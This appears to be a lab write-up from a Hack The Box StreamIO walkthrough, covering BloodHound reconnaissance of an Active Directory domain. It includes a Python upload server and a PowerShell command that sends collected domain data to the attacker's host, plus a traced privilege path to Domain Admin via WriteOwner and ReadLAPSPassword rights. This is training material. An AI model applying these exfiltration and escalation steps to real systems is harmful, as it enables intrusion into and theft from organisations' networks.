InfoSec LAB

StreamIO_BloodHound

Created: 2 min read

BloodHound

BloodHound is a powerful tool used by adversaries to visualize and analyze Active Directory relationships, allowing them to quickly identify and exploit potential attack paths and privilege escalation opportunities within a network. It automates the reconnaissance phase of an attack, helping attackers pinpoint weak points and ultimately compromise Active Directory environments.

Now that I have gain a foothold to the target system, I can attempt to get BloodHound up and running

Ingestion

a BloodHound ingestor, SharpHound, is embedded into adPEAS adPEAS execution already completed the ingestion

lmcompatibilitylevel is set to 3, authentication required for SMB connection, and I don’t have the current user’s password (yoshihide) I would need to find a way to transfer the ingested data.

┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ cat post.py 
from http.server import BaseHTTPRequestHandler, HTTPServer
 
class MyRequestHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        data = self.rfile.read(content_length)
        with open('streamIO.htb_20231114111207_BloodHound.zip', 'wb') as f:
            f.write(data)
        self.send_response(200)
 
httpd = HTTPServer(('0.0.0.0', 2222), MyRequestHandler)
httpd.serve_forever()

Here is a little Python web server that support a POST request

PS C:\tmp> iwr -Uri 'http://10.10.16.8:2222' -Method POST -InFile streamIO.htb_20231114111207_BloodHound.zip
 
┌──(kali㉿kali)-[~/…/htb/labs/streamio/bloodhound]
└─$ python3 post.py
10.10.11.158 - - [14/Nov/2023 13:24:53] "POST / HTTP/1.1" 200 -

Transfer complete over HTTP

Prep

┌──(kali㉿kali)-[~/…/htb/labs/streamio/bloodhound]
└─$ sudo neo4j console
directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /usr/share/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /usr/share/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /usr/share/neo4j/run
Starting Neo4j.
 
┌──(kali㉿kali)-[~/…/htb/labs/streamio/bloodhound]
└─$ bloodhound

Firing up neo4j and bloodhound

Ingested domain data has been uploaded

yoshihide

The yoshihide account doesn’t have much going on within the domain

nikk37

The nikk37 user is part of the Remote Management Users group The user is able to WinRM to the target system

JDgodd

The jdgodd user has both WriteOwner and Ownership privileges over the Core Staff group Additionally, the Core Staff group has ReadLAPSPassword privilege over the DC host

This appears to be the most relevant route to DA

Martin

While the martin user is a local administrator to the DC host, the user is also part of the Domain Admins group This user appears to be pretty much out of reach

Interactive Graph View

Backlinks